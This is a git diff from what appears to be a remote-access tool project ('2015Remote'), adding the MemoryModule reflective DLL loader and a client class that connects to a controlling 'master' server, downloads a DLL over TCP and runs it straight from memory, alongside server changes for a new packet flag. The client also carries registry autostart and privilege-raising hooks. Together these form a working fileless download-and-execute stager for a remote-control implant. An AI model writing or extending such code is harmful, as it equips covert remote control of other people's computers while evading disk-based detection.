&entries[middle]; + break; + } + } +#if !defined(UNICODE) + if (searchKeyLen > MAX_LOCAL_KEY_LENGTH) { + free(_searchKey); + } +#undef MAX_LOCAL_KEY_LENGTH +#endif + } + + return result; +} + +HMEMORYRSRC MemoryFindResourceEx(HMEMORYMODULE module, LPCTSTR name, LPCTSTR type, WORD language) +{ + unsigned char *codeBase = ((PMEMORYMODULE) module)->codeBase; + PIMAGE_DATA_DIRECTORY directory = GET_HEADER_DICTIONARY((PMEMORYMODULE) module, IMAGE_DIRECTORY_ENTRY_RESOURCE); + PIMAGE_RESOURCE_DIRECTORY rootResources; + PIMAGE_RESOURCE_DIRECTORY nameResources; + PIMAGE_RESOURCE_DIRECTORY typeResources; + PIMAGE_RESOURCE_DIRECTORY_ENTRY foundType; + PIMAGE_RESOURCE_DIRECTORY_ENTRY foundName; + PIMAGE_RESOURCE_DIRECTORY_ENTRY foundLanguage; + if (directory->Size == 0) { + // no resource table found + SetLastError(ERROR_RESOURCE_DATA_NOT_FOUND); + return NULL; + } + + if (language == DEFAULT_LANGUAGE) { + // use language from current thread + language = LANGIDFROMLCID(GetThreadLocale()); + } + + // resources are stored as three-level tree + // - first node is the type + // - second node is the name + // - third node is the language + rootResources = (PIMAGE_RESOURCE_DIRECTORY) (codeBase + directory->VirtualAddress); + foundType = _MemorySearchResourceEntry(rootResources, rootResources, type); + if (foundType == NULL) { + SetLastError(ERROR_RESOURCE_TYPE_NOT_FOUND); + return NULL; + } + + typeResources = (PIMAGE_RESOURCE_DIRECTORY) (codeBase + directory->VirtualAddress + (foundType->OffsetToData & 0x7fffffff)); + foundName = _MemorySearchResourceEntry(rootResources, typeResources, name); + if (foundName == NULL) { + SetLastError(ERROR_RESOURCE_NAME_NOT_FOUND); + return NULL; + } + + nameResources = (PIMAGE_RESOURCE_DIRECTORY) (codeBase + directory->VirtualAddress + (foundName->OffsetToData & 0x7fffffff)); + foundLanguage = _MemorySearchResourceEntry(rootResources, nameResources, (LPCTSTR) (uintptr_t) language); + if (foundLanguage == NULL) { + // requested language not found, use first available + if (nameResources->NumberOfIdEntries == 0) { + SetLastError(ERROR_RESOURCE_LANG_NOT_FOUND); + return NULL; + } + + foundLanguage = (PIMAGE_RESOURCE_DIRECTORY_ENTRY) (nameResources + 1); + } + + return (codeBase + directory->VirtualAddress + (foundLanguage->OffsetToData & 0x7fffffff)); +} + +DWORD MemorySizeofResource(HMEMORYMODULE module, HMEMORYRSRC resource) +{ + PIMAGE_RESOURCE_DATA_ENTRY entry; + UNREFERENCED_PARAMETER(module); + entry = (PIMAGE_RESOURCE_DATA_ENTRY) resource; + if (entry == NULL) { + return 0; + } + + return entry->Size; +} + +LPVOID MemoryLoadResource(HMEMORYMODULE module, HMEMORYRSRC resource) +{ + unsigned char *codeBase = ((PMEMORYMODULE) module)->codeBase; + PIMAGE_RESOURCE_DATA_ENTRY entry = (PIMAGE_RESOURCE_DATA_ENTRY) resource; + if (entry == NULL) { + return NULL; + } + + return codeBase + entry->OffsetToData; +} + +int +MemoryLoadString(HMEMORYMODULE module, UINT id, LPTSTR buffer, int maxsize) +{ + return MemoryLoadStringEx(module, id, buffer, maxsize, DEFAULT_LANGUAGE); +} + +int +MemoryLoadStringEx(HMEMORYMODULE module, UINT id, LPTSTR buffer, int maxsize, WORD language) +{ + HMEMORYRSRC resource; + PIMAGE_RESOURCE_DIR_STRING_U data; + DWORD size; + if (maxsize == 0) { + return 0; + } + + resource = MemoryFindResourceEx(module, MAKEINTRESOURCE((id >> 4) + 1), RT_STRING, language); + if (resource == NULL) { + buffer[0] = 0; + return 0; + } + + data = (PIMAGE_RESOURCE_DIR_STRING_U) MemoryLoadResource(module, resource); + id = id & 0x0f; + while (id--) { + data = (PIMAGE_RESOURCE_DIR_STRING_U) OffsetPointer(data, (data->Length + 1) * sizeof(WCHAR)); + } + if (data->Length == 0) { + SetLastError(ERROR_RESOURCE_NAME_NOT_FOUND); + buffer[0] = 0; + return 0; + } + + size = data->Length; + if (size >= (DWORD) maxsize) { + size = maxsize; + } else { + buffer[size] = 0; + } +#if defined(UNICODE) + wcsncpy(buffer, data->NameString, size); +#else + wcstombs(buffer, data->NameString, size); +#endif + return size; +} + +#ifdef TESTSUITE +#include + +#ifndef PRIxPTR +#ifdef _WIN64 +#define PRIxPTR "I64x" +#else +#define PRIxPTR "x" +#endif +#endif + +static const uintptr_t AlignValueDownTests[][3] = { + {16, 16, 16}, + {17, 16, 16}, + {32, 16, 32}, + {33, 16, 32}, +#ifdef _WIN64 + {0x12345678abcd1000, 0x1000, 0x12345678abcd1000}, + {0x12345678abcd101f, 0x1000, 0x12345678abcd1000}, +#endif + {0, 0, 0}, +}; + +static const uintptr_t AlignValueUpTests[][3] = { + {16, 16, 16}, + {17, 16, 32}, + {32, 16, 32}, + {33, 16, 48}, +#ifdef _WIN64 + {0x12345678abcd1000, 0x1000, 0x12345678abcd1000}, + {0x12345678abcd101f, 0x1000, 0x12345678abcd2000}, +#endif + {0, 0, 0}, +}; + +BOOL MemoryModuleTestsuite() { + BOOL success = TRUE; + size_t idx; + for (idx = 0; AlignValueDownTests[idx][0]; ++idx) { + const uintptr_t* tests = AlignValueDownTests[idx]; + uintptr_t value = AlignValueDown(tests[0], tests[1]); + if (value != tests[2]) { + printf("AlignValueDown failed for 0x%" PRIxPTR "/0x%" PRIxPTR ": expected 0x%" PRIxPTR ", got 0x%" PRIxPTR "\n", + tests[0], tests[1], tests[2], value); + success = FALSE; + } + } + for (idx = 0; AlignValueDownTests[idx][0]; ++idx) { + const uintptr_t* tests = AlignValueUpTests[idx]; + uintptr_t value = AlignValueUp(tests[0], tests[1]); + if (value != tests[2]) { + printf("AlignValueUp failed for 0x%" PRIxPTR "/0x%" PRIxPTR ": expected 0x%" PRIxPTR ", got 0x%" PRIxPTR "\n", + tests[0], tests[1], tests[2], value); + success = FALSE; + } + } + if (success) { + printf("OK\n"); + } + return success; +} +#endif diff --git a/client/MemoryModule.h b/client/MemoryModule.h new file mode 100644 index 0000000..a728f6b --- /dev/null +++ b/client/MemoryModule.h @@ -0,0 +1,168 @@ +/* + * Memory DLL loading code + * Version 0.0.4 + * + * Copyright (c) 2004-2015 by Joachim Bauch / mail@joachim-bauch.de + * http://www.joachim-bauch.de + * + * The contents of this file are subject to the Mozilla Public License Version + * 2.0 (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * http://www.mozilla.org/MPL/ + * + * Software distributed under the License is distributed on an "AS IS" basis, + * WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License + * for the specific language governing rights and limitations under the + * License. + * + * The Original Code is MemoryModule.h + * + * The Initial Developer of the Original Code is Joachim Bauch. + * + * Portions created by Joachim Bauch are Copyright (C) 2004-2015 + * Joachim Bauch. All Rights Reserved. + * + */ + +#ifndef __MEMORY_MODULE_HEADER +#define __MEMORY_MODULE_HEADER + +#include + +typedef void *HMEMORYMODULE; + +typedef void *HMEMORYRSRC; + +typedef void *HCUSTOMMODULE; + +#ifdef __cplusplus +extern "C" { +#endif + +typedef LPVOID (*CustomAllocFunc)(LPVOID, SIZE_T, DWORD, DWORD, void*); +typedef BOOL (*CustomFreeFunc)(LPVOID, SIZE_T, DWORD, void*); +typedef HCUSTOMMODULE (*CustomLoadLibraryFunc)(LPCSTR, void *); +typedef FARPROC (*CustomGetProcAddressFunc)(HCUSTOMMODULE, LPCSTR, void *); +typedef void (*CustomFreeLibraryFunc)(HCUSTOMMODULE, void *); + +/** + * Load EXE/DLL from memory location with the given size. + * + * All dependencies are resolved using default LoadLibrary/GetProcAddress + * calls through the Windows API. + */ +HMEMORYMODULE MemoryLoadLibrary(const void *, size_t); + +/** + * Load EXE/DLL from memory location with the given size using custom dependency + * resolvers. + * + * Dependencies will be resolved using passed callback methods. + */ +HMEMORYMODULE MemoryLoadLibraryEx(const void *, size_t, + CustomAllocFunc, + CustomFreeFunc, + CustomLoadLibraryFunc, + CustomGetProcAddressFunc, + CustomFreeLibraryFunc, + void *); + +/** + * Get address of exported method. Supports loading both by name and by + * ordinal value. + */ +FARPROC MemoryGetProcAddress(HMEMORYMODULE, LPCSTR); + +/** + * Free previously loaded EXE/DLL. + */ +void MemoryFreeLibrary(HMEMORYMODULE); + +/** + * Execute entry point (EXE only). The entry point can only be executed + * if the EXE has been loaded to the correct base address or it could + * be relocated (i.e. relocation information have not been stripped by + * the linker). + * + * Important: calling this function will not return, i.e. once the loaded + * EXE finished running, the process will terminate. + * + * Returns a negative value if the entry point could not be executed. + */ +int MemoryCallEntryPoint(HMEMORYMODULE); + +/** + * Find the location of a resource with the specified type and name. + */ +HMEMORYRSRC MemoryFindResource(HMEMORYMODULE, LPCTSTR, LPCTSTR); + +/** + * Find the location of a resource with the specified type, name and language. + */ +HMEMORYRSRC MemoryFindResourceEx(HMEMORYMODULE, LPCTSTR, LPCTSTR, WORD); + +/** + * Get the size of the resource in bytes. + */ +DWORD MemorySizeofResource(HMEMORYMODULE, HMEMORYRSRC); + +/** + * Get a pointer to the contents of the resource. + */ +LPVOID MemoryLoadResource(HMEMORYMODULE, HMEMORYRSRC); + +/** + * Load a string resource. + */ +int MemoryLoadString(HMEMORYMODULE, UINT, LPTSTR, int); + +/** + * Load a string resource with a given language. + */ +int MemoryLoadStringEx(HMEMORYMODULE, UINT, LPTSTR, int, WORD); + +/** +* Default implementation of CustomAllocFunc that calls VirtualAlloc +* internally to allocate memory for a library +* +* This is the default as used by MemoryLoadLibrary. +*/ +LPVOID MemoryDefaultAlloc(LPVOID, SIZE_T, DWORD, DWORD, void *); + +/** +* Default implementation of CustomFreeFunc that calls VirtualFree +* internally to free the memory used by a library +* +* This is the default as used by MemoryLoadLibrary. +*/ +BOOL MemoryDefaultFree(LPVOID, SIZE_T, DWORD, void *); + +/** + * Default implementation of CustomLoadLibraryFunc that calls LoadLibraryA + * internally to load an additional libary. + * + * This is the default as used by MemoryLoadLibrary. + */ +HCUSTOMMODULE MemoryDefaultLoadLibrary(LPCSTR, void *); + +/** + * Default implementation of CustomGetProcAddressFunc that calls GetProcAddress + * internally to get the address of an exported function. + * + * This is the default as used by MemoryLoadLibrary. + */ +FARPROC MemoryDefaultGetProcAddress(HCUSTOMMODULE, LPCSTR, void *); + +/** + * Default implementation of CustomFreeLibraryFunc that calls FreeLibrary + * internally to release an additional libary. + * + * This is the default as used by MemoryLoadLibrary. + */ +void MemoryDefaultFreeLibrary(HCUSTOMMODULE, void *); + +#ifdef __cplusplus +} +#endif + +#endif // __MEMORY_MODULE_HEADER diff --git a/client/TestRun_vs2015.vcxproj b/client/TestRun_vs2015.vcxproj index 42ff978..95e6ab4 100644 --- a/client/TestRun_vs2015.vcxproj +++ b/client/TestRun_vs2015.vcxproj @@ -154,9 +154,11 @@ + + diff --git a/client/test.cpp b/client/test.cpp index 7d5a51e..43e4985 100644 --- a/client/test.cpp +++ b/client/test.cpp @@ -1,9 +1,12 @@ -#include + #include #include #include #include "common/commands.h" #include "StdAfx.h" +#include "MemoryModule.h" +#include +#pragma comment(lib, "ws2_32.lib") // 自动启动注册表中的值 #define REG_NAME "a_ghost" @@ -25,7 +28,7 @@ IsExit bExit = NULL; BOOL status = 0; -CONNECT_ADDRESS g_ConnectAddress = { FLAG_FINDEN, "127.0.0.1", "6543", CLIENT_TYPE_DLL }; +CONNECT_ADDRESS g_ConnectAddress = { FLAG_FINDEN, "127.0.0.1", "6543", CLIENT_TYPE_MEMDLL }; //提升权限 void DebugPrivilege() @@ -96,6 +99,157 @@ BOOL CALLBACK callback(DWORD CtrlType) // 运行程序. BOOL Run(const char* argv1, int argv2); +// Package header. +typedef struct PkgHeader { + char flag[8]; + int totalLen; + int originLen; + PkgHeader(int size) { + memset(flag, 0, sizeof(flag)); + strcpy_s(flag, "Hello?"); + originLen = size; + totalLen = sizeof(PkgHeader) + size; + } +}PkgHeader; + +// A DLL runner. +class DllRunner { +public: + virtual void* LoadLibraryA(const char* path) = 0; + virtual FARPROC GetProcAddress(void* mod, const char* lpProcName) = 0; + virtual BOOL FreeLibrary(void* mod) = 0; +}; + +// Default DLL runner. +class DefaultDllRunner : public DllRunner { +private: + HMODULE m_mod; +public: + DefaultDllRunner() : m_mod(nullptr) {} + // Load DLL from the disk. + virtual void* LoadLibraryA(const char* path) { + return m_mod = ::LoadLibraryA(path); + } + virtual FARPROC GetProcAddress(void *mod, const char* lpProcName) { + return ::GetProcAddress(m_mod, lpProcName); + } + virtual BOOL FreeLibrary(void* mod) { + return ::FreeLibrary(m_mod); + } +}; + +// Memory DLL runner. +class MemoryDllRunner : public DllRunner { +private: + HMEMORYMODULE m_mod; + std::string GetIPAddress(const char* hostName) + { + // 1. 判断是不是合法的 IPv4 地址 + sockaddr_in sa; + if (inet_pton(AF_INET, hostName, &(sa.sin_addr)) == 1) { + // 是合法 IPv4 地址,直接返回 + return std::string(hostName); + } + + // 2. 否则尝试解析域名 + addrinfo hints = {}, * res = nullptr; + hints.ai_family = AF_INET; // 只支持 IPv4 + hints.ai_socktype = SOCK_STREAM; + hints.ai_protocol = IPPROTO_TCP; + + if (getaddrinfo(hostName, nullptr, &hints, &res) != 0) + return ""; + + char ipStr[INET_ADDRSTRLEN] = {}; + sockaddr_in* ipv4 = (sockaddr_in*)res->ai_addr; + inet_ntop(AF_INET, &(ipv4->sin_addr), ipStr, INET_ADDRSTRLEN); + + freeaddrinfo(res); + return std::string(ipStr); + } +public: + MemoryDllRunner() : m_mod(nullptr){} + // Request DLL from the master. + virtual void* LoadLibraryA(const char* path) { + WSADATA wsaData = {}; + if (WSAStartup(MAKEWORD(2, 2), &wsaData)) + return nullptr; + + const int bufSize = 4 * 1024 * 1024; + char* buffer = new char[bufSize]; + bool isFirstConnect = true; + + do{ + if (!isFirstConnect) + Sleep(5000); + + isFirstConnect = false; + SOCKET clientSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); + if (clientSocket == INVALID_SOCKET) { + continue; + } + + DWORD timeout = 5000; + setsockopt(clientSocket, SOL_SOCKET, SO_RCVTIMEO, (const char*)&timeout, sizeof(timeout)); + + sockaddr_in serverAddr = {}; + serverAddr.sin_family = AF_INET; + serverAddr.sin_port = htons(g_ConnectAddress.ServerPort()); + std::string ip = GetIPAddress(g_ConnectAddress.ServerIP()); + serverAddr.sin_addr.s_addr = inet_addr(ip.c_str()); + if (connect(clientSocket, (SOCKADDR*)&serverAddr, sizeof(serverAddr)) == SOCKET_ERROR) { + closesocket(clientSocket); + continue; + } +#ifdef _DEBUG + char command[4] = { SOCKET_DLLLOADER, sizeof(void*) == 8, MEMORYDLL, 0 }; +#else + char command[4] = { SOCKET_DLLLOADER, sizeof(void*) == 8, MEMORYDLL, 1 }; +#endif + char req[sizeof(PkgHeader) + 4] = {}; + memcpy(req, &PkgHeader(4), sizeof(PkgHeader)); + memcpy(req + sizeof(PkgHeader), command, sizeof(command)); + auto bytesSent = send(clientSocket, req, sizeof(req), 0); + if (bytesSent != sizeof(req)) { + closesocket(clientSocket); + continue; + } + char *ptr = buffer + sizeof(PkgHeader); + int bufferSize = 16 * 1024, bytesReceived = 0, totalReceived = 0; + while (totalReceived < bufSize) { + int bytesToReceive = min(bufferSize, bufSize - totalReceived); + int bytesReceived = recv(clientSocket, buffer + totalReceived, bytesToReceive, 0); + if (bytesReceived <= 0) break; + totalReceived += bytesReceived; + } + if (totalReceived < sizeof(PkgHeader) + 6) { + closesocket(clientSocket); + continue; + } + BYTE cmd = ptr[0], type = ptr[1]; + int size = 0; + memcpy(&size, ptr + 2, sizeof(int)); + if (totalReceived != size + 6 + sizeof(PkgHeader)) { + continue; + } + + m_mod = ::MemoryLoadLibrary(buffer + 6 + sizeof(PkgHeader), size); + closesocket(clientSocket); + } while (false); + + SAFE_DELETE_ARRAY(buffer); + WSACleanup(); + return m_mod; + } + virtual FARPROC GetProcAddress(void* mod, const char* lpProcName) { + return ::MemoryGetProcAddress((HMEMORYMODULE)mod, lpProcName); + } + virtual BOOL FreeLibrary(void* mod) { + ::MemoryFreeLibrary((HMEMORYMODULE)mod); + return TRUE; + } +}; + // @brief 首先读取settings.ini配置文件,获取IP和端口. // [settings] // localIp=XXX @@ -161,16 +315,18 @@ BOOL Run(const char* argv1, int argv2) { Mprintf("Using new file: %s\n", newFile.c_str()); } } - HMODULE hDll = LoadLibraryA(path); + DllRunner* runner = g_ConnectAddress.iType ? (DllRunner*) new MemoryDllRunner : new DefaultDllRunner; + void* hDll = runner->LoadLibraryA(path); typedef void (*TestRun)(char* strHost, int nPort); - TestRun run = hDll ? TestRun(GetProcAddress(hDll, "TestRun")) : NULL; - stop = hDll ? StopRun(GetProcAddress(hDll, "StopRun")) : NULL; - bStop = hDll ? IsStoped(GetProcAddress(hDll, "IsStoped")) : NULL; - bExit = hDll ? IsExit(GetProcAddress(hDll, "IsExit")) : NULL; + TestRun run = hDll ? TestRun(runner->GetProcAddress(hDll, "TestRun")) : NULL; + stop = hDll ? StopRun(runner->GetProcAddress(hDll, "StopRun")) : NULL; + bStop = hDll ? IsStoped(runner->GetProcAddress(hDll, "IsStoped")) : NULL; + bExit = hDll ? IsExit(runner->GetProcAddress(hDll, "IsExit")) : NULL; if (NULL == run) { - if (hDll) FreeLibrary(hDll); + if (hDll) runner->FreeLibrary(hDll); Mprintf("加载动态链接库\"ServerDll.dll\"失败. 错误代码: %d\n", GetLastError()); Sleep(3000); + delete runner; return FALSE; } do @@ -201,11 +357,12 @@ BOOL Run(const char* argv1, int argv2) { result = bExit(); } } while (result == 2); - if (!FreeLibrary(hDll)) { + if (!runner->FreeLibrary(hDll)) { Mprintf("释放动态链接库\"ServerDll.dll\"失败. 错误代码: %d\n", GetLastError()); } else { Mprintf("释放动态链接库\"ServerDll.dll\"成功!\n"); } + delete runner; return result; } diff --git a/server/2015Remote/IOCPServer.cpp b/server/2015Remote/IOCPServer.cpp index c17128b..9c28149 100644 --- a/server/2015Remote/IOCPServer.cpp +++ b/server/2015Remote/IOCPServer.cpp @@ -506,6 +506,14 @@ BOOL IOCPServer::OnClientReceiving(PCONTEXT_OBJECT ContextObject, DWORD dwTrans delete[] CompressedBuffer; throw "Unknown method"; } + else if (ContextObject->CompressMethod == COMPRESS_NONE) { + ContextObject->InDeCompressedBuffer.ClearBuffer(); + ContextObject->InDeCompressedBuffer.WriteBuffer(CompressedBuffer, ulOriginalLength); + ContextObject->Decode(CompressedBuffer, ulOriginalLength); + m_NotifyProc(ContextObject); + SAFE_DELETE_ARRAY(CompressedBuffer); + break; + } bool usingZstd = ContextObject->CompressMethod == COMPRESS_ZSTD, zlibFailed = false; PBYTE DeCompressedBuffer = new BYTE[ulOriginalLength]; //解压过的内存 size_t iRet = usingZstd ? @@ -570,12 +578,17 @@ VOID IOCPServer::OnClientPreSending(CONTEXT_OBJECT* ContextObject, PBYTE szBuffe } try { - if (ulOriginalLength > 0) + do { + if (ulOriginalLength <= 0) return; if (ContextObject->CompressMethod == COMPRESS_UNKNOWN) { OutputDebugStringA("[ERROR] UNKNOWN compress method \n"); return; } + else if (ContextObject->CompressMethod == COMPRESS_NONE) { + ContextObject->WriteBuffer(szBuffer, ulOriginalLength, ulOriginalLength); + break; + } bool usingZstd = ContextObject->CompressMethod == COMPRESS_ZSTD; #if USING_LZ4 unsigned long ulCompressedLength = LZ4_compressBound(ulOriginalLength); @@ -601,7 +614,7 @@ VOID IOCPServer::OnClientPreSending(CONTEXT_OBJECT* ContextObject, PBYTE szBuffe ContextObject->WriteBuffer(CompressedBuffer, ulCompressedLength, ulOriginalLength); delete [] CompressedBuffer; - } + }while (false); OVERLAPPEDPLUS* OverlappedPlus = new OVERLAPPEDPLUS(IOWrite); BOOL bOk = PostQueuedCompletionStatus(m_hCompletionPort, 0, (ULONG_PTR)ContextObject, &OverlappedPlus->m_ol); diff --git a/server/2015Remote/IOCPServer.h b/server/2015Remote/IOCPServer.h index d1f9896..988d0c0 100644 --- a/server/2015Remote/IOCPServer.h +++ b/server/2015Remote/IOCPServer.h @@ -72,6 +72,13 @@ typedef struct PR { } }PR; +enum { + COMPRESS_UNKNOWN = -2, // 未知压缩算法 + COMPRESS_ZLIB = -1, // 以前版本使用的压缩方法 + COMPRESS_ZSTD = 0, // 当前使用的压缩方法 + COMPRESS_NONE = 1, // 没有压缩 +}; + struct CONTEXT_OBJECT; // Header parser: parse the data to make sure it's from a supported client. @@ -84,7 +91,7 @@ protected: virtual ~HeaderParser() { Reset(); } - PR Parse(CBuffer& buf) { + PR Parse(CBuffer& buf, int &compressMethod) { const int MinimumCount = 8; if (buf.GetBufferLength() < MinimumCount) { return PR{ PARSER_NEEDMORE }; @@ -95,7 +102,7 @@ protected: return memcmp(m_szPacketFlag, szPacketFlag, m_nCompareLen) == 0 ? PR{ m_nFlagLen } : PR{ PARSER_FAILED }; } // More version may be added in the future. - const char version0[] = "Shine", version1[] = "<>"; + const char version0[] = "Shine", version1[] = "<>", version2[] = "Hello?"; if (memcmp(version0, szPacketFlag, sizeof(version0) - 1) == 0) { memcpy(m_szPacketFlag, version0, sizeof(version0) - 1); m_nCompareLen = strlen(m_szPacketFlag); @@ -112,6 +119,15 @@ protected: m_bParsed = TRUE; m_Encoder = new XOREncoder(); } + else if (memcmp(version2, szPacketFlag, sizeof(version2) - 1) == 0) { + memcpy(m_szPacketFlag, version2, sizeof(version2) - 1); + m_nCompareLen = strlen(m_szPacketFlag); + m_nFlagLen = 8; + m_nHeaderLen = m_nFlagLen + 8; + m_bParsed = TRUE; + compressMethod = COMPRESS_NONE; + m_Encoder = new Encoder(); + } else { return PR{ PARSER_FAILED }; } @@ -154,12 +170,6 @@ enum IOType IOIdle }; -enum { - COMPRESS_UNKNOWN = -2, // 未知压缩算法 - COMPRESS_ZLIB = -1, // 以前版本使用的压缩方法 - COMPRESS_ZSTD = 0, // 当前使用的压缩方法 -}; - typedef struct CONTEXT_OBJECT { CString sClientInfo[10]; @@ -224,7 +234,7 @@ typedef struct CONTEXT_OBJECT } // Parse the data to make sure it's from a supported client. The length of `Header Flag` will be returned. PR Parse(CBuffer& buf) { - return Parser.Parse(buf); + return Parser.Parse(buf, CompressMethod); } // Encode data before compress. void Encode(PBYTE data, int len) const {